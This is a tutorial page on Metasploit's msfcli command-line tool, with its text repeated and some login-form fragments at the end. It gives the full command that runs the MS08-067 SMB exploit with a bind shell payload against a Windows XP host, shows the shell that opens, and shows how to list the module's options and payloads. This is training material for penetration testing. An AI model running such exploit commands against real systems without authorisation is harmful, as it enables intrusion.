msfcli

Msfcli provides a powerful command-line interface to the framework.

Note that when using msfcli, variables are assigned using '=' and that all options are case-sensitive.

root@bt4:/pentest/exploits/framework3# ./msfcli windows/smb/ms08_067_netapi RHOST=192.168.1.115 PAYLOAD=windows/shell/bind_tcp E [*] Please wait while we load the module tree... [*] Started bind handler [*] Automatically detecting the target... [*] Fingerprint: Windows XP Service Pack 2 - lang:English [*] Selected Target: Windows XP SP2 English (NX) [*] Triggering the vulnerability... [*] Sending stage (474 bytes) [*] Command shell session 1 opened (192.168.1.101:54659 -> 192.168.1.115:4444) Microsoft Windows XP [Version 5.1.2600] (C) Copyright 1985-2001 Microsoft Corp. C:\WINDOWS\system32>
If you aren't entirely sure about what options belong to a particular module, you can append the letter 'O' to the end of the string at whichever point you are stuck.

root@bt4:/pentest/exploits/framework3# ./msfcli windows/smb/ms08_067_netapi O [*] Please wait while we load the module tree... Name Current Setting Required Description ---- --------------- -------- ----------- RHOST yes The target address RPORT 445 yes Set the SMB service port SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC)
To display the payloads that are available for the current module, append the letter 'P' to the command-line string.

root@bt4:/pentest/exploits/framework3# ./msfcli windows/smb/ms08_067_netapi RHOST=192.168.1.115 P [*] Please wait while we load the module tree... Compatible payloads =================== Name Description ---- ----------- generic/debug_trap Generate a debug trap in the target process ...snip...
The other options available to msfcli are available by issuing 'msfcli -h'.

Benefits of mscli:

Supports the launching of exploits and auxiliary modules
Useful for specific tasks
Good for learning
Convenient to use when testing or developing a new exploit
Good tool for one-off exploitation
Excellent if you know exactly which exploit and options you need
Wonderful for use in scripts and basic automation

The only real drawback of msfcli is that it is not supported quite as well as msfconsole and it can only handle one shell at a time, making it rather impractical for client-side attacks. It also doesn't support any of the advanced automation features of msfconsole.

msfcli

Msfcli provides a powerful command-line interface to the framework.

Note that when using msfcli, variables are assigned using '=' and that all options are case-sensitive.

 root@bt4:/pentest/exploits/framework3# ./msfcli windows/smb/ms08_067_netapi RHOST=192.168.1.115 PAYLOAD=windows/shell/bind_tcp E
[*] Please wait while we load the module tree...
[*] Started bind handler
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP Service Pack 2 - lang:English
[*] Selected Target: Windows XP SP2 English (NX)
[*] Triggering the vulnerability...
[*] Sending stage (474 bytes)
[*] Command shell session 1 opened (192.168.1.101:54659 -> 192.168.1.115:4444)

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>

If you aren't entirely sure about what options belong to a particular module, you can append the letter 'O' to the end of the string at whichever point you are stuck.

root@bt4:/pentest/exploits/framework3# ./msfcli windows/smb/ms08_067_netapi O
[*] Please wait while we load the module tree...

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOST                     yes       The target address
   RPORT    445              yes       Set the SMB service port
   SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)

To display the payloads that are available for the current module, append the letter 'P' to the command-line string.

 root@bt4:/pentest/exploits/framework3# ./msfcli windows/smb/ms08_067_netapi RHOST=192.168.1.115 P
[*] Please wait while we load the module tree...

Compatible payloads
===================

   Name                                             Description
   ----                                             -----------
   generic/debug_trap                               Generate a debug trap in the target process
...snip...

The other options available to msfcli are available by issuing 'msfcli -h'.

Benefits of mscli:

Supports the launching of exploits and auxiliary modules

Useful for specific tasks

Good for learning

Convenient to use when testing or developing a new exploit

Good tool for one-off exploitation

Excellent if you know exactly which exploit and options you need

Wonderful for use in scripts and basic automation

Username
Password
Remember me

System message

msfcli

Benefits of mscli:

msfcli

Benefits of mscli: